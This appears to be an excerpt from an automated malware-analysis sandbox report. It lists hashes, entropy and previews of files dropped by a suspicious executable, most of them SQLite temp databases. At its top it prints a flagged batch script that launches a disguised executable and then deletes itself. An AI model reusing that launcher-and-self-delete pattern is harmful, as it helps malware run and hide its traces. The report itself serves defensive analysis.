SHA1:	3A19463DDB4955AC1AA62B810A4E8F4075A74649
SHA-256:	CD9B673C583DF4F541BE297F42FBECB1C9F230A3EC36FD76FB03302F9C34191C
SHA-512:	0CF6E094E833C3C30B8C9893C4E39AEC15F375BA869E388B91712079E4502A252F836AAC6CC4605828F8CB8369CB1CF5E12ABA8B68DCC176D5A706436002F3B9
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Users\Default User\My Documents\My Pictures\XXPWErhsUbDrk.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\28moAYly7n.bat"

C:\Users\user\AppData\Local\Temp\2HAwxIgCir

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\2MBjDkjtnc

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.5793180405395284
Encrypted:	false
SSDEEP:	96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\2jdfh5ZP1u

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\30dXVdli9U

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.5793180405395284
Encrypted:	false
SSDEEP:	96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\3UJhkOZEjV

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\3mPgAbqAwM

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\44Fa4qmXwC

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\4JEijRsXB3

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\4JIBT30mvl

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\4dOB8oioHN

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\4lVFdTKR5c

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.5793180405395284
Encrypted:	false
SSDEEP:	96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\4nwBgY6nYM

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\4pyo9obnQ2

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\4vUFNwDjB1

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5712781801655107
Encrypted:	false
SSDEEP:	12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:	05A60B4620923FD5D53B9204391452AF
SHA1:	DC12F90925033F25C70A720E01D5F8666D0B46E4
SHA-256:	6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
SHA-512:	068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\4xF0ndNYR1

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\5Mj2akZqlN

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5707520969659783
Encrypted:	false
SSDEEP:	12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:	9F6D153D934BCC50E8BC57E7014B201A
SHA1:	50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
SHA-256:	2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
SHA-512:	B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
Malicious:	false
Preview:	SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\5aKVA6EUOv

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\5hZnllMgtr

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\5okqcWEmw1

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\65KytBYWtj

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5712781801655107
Encrypted:	false
SSDEEP:	12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:	05A60B4620923FD5D53B9204391452AF
SHA1:	DC12F90925033F25C70A720E01D5F8666D0B46E4
SHA-256:	6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
SHA-512:	068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\6Lp9iaSujL

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\6RlmaiBDJh

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\6zdPnU8B9w

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5707520969659783
Encrypted:	false
SSDEEP:	12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:	9F6D153D934BCC50E8BC57E7014B201A
SHA1:	50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
SHA-256:	2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
SHA-512:	B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
Malicious:	false
Preview:	SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\73ZaSM0LDE

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\7DtyM9LoO2

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\7UdooU2JF5

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.5793180405395284
Encrypted:	false
SSDEEP:	96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
